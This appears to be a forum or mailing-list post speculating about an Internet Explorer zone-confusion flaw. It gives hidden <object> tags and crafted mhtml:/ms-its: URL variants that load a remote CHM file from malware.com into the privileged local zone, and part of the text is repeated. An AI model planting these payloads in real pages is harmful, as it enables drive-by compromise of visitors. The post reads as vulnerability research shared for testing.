where Internet Explorer gets 'confused' by the url
mhtml:file://C:foo.mhtml! switches to the local zone as a
result of C:, stays there and passes through to the 'back end'
http://www.malware.com//bad.chm::/foo.html on the remote server
while in the 'local zone' and renders foo.html in there.
If this peculiar DNS setup also has a 'proper' chm file on it
the following should work [as it does on any server setup]:
There is a sneaking suspicion that you can put the site contents
in the so-called 'local zone' or 'my computer'.
Since it validates the 'front end' of the address and ends up at
the 'back end' this all would seem very similar to:
<object data="ms-its:mhtml:file://C:foo.mhtml!
http://www.malware.com//bad.chm::/foo.html" type="text/x-
scriptlet" style="visibility:hidden">
where Internet Explorer gets 'confused' by the url
mhtml:file://C:foo.mhtml! switches to the local zone as a
result of C:, stays there and passes through to the 'back end'
http://www.malware.com//bad.chm::/foo.html on the remote server
while in the 'local zone' and renders foo.html in there.
If this peculiar DNS setup also has a 'proper' chm file on it
the following should work [as it does on any server setup]:
<object data="ms-its:http://www.malware.com//bad.chm::/foo.html"
type="text/x-scriptlet" style="visibility:hidden">
now as above if we include in the 'front end':
ms-
its:C:\\WINDOWS\\Help\\iexplore.chm::/http://www.malware.com//bad
.chm::/foo.html
It should see it as in C: and make its little 'zone'
determination first, then pass through to the 'back end'
http://www.malware.com//bad.chm::/foo.html
and render foo.html in the 'local zone' even though it is on the
remote server.
You'd have to tinker quite a bit:
ms-its:C:::/http://www.malware.com//bad.chm::/foo.html
ms-its:C:%2Fredir=/http://www.malware.com//bad.chm::/foo.html
etc.
Anyone have a server they care to setup?
--
http://www.malware.com
[ reply ]